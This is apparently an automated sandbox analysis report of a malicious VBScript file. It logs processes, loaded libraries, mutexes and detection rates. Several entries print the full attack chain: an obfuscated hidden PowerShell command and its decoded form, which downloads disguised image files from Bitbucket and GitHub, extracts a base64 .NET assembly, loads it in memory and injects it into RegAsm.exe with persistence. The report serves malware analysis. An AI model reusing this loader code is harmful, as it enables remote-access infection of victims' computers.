Code function: 13_2_00413168 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

13_2_00413168

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-JX5AIB

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blz4h04t.10f.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: scan_doc20241024.vbs	Virustotal: Detection: 17%
Source: scan_doc20241024.vbs	ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_doc20241024.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.SmniiFI/niam/sdaeh/sfer/ann/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
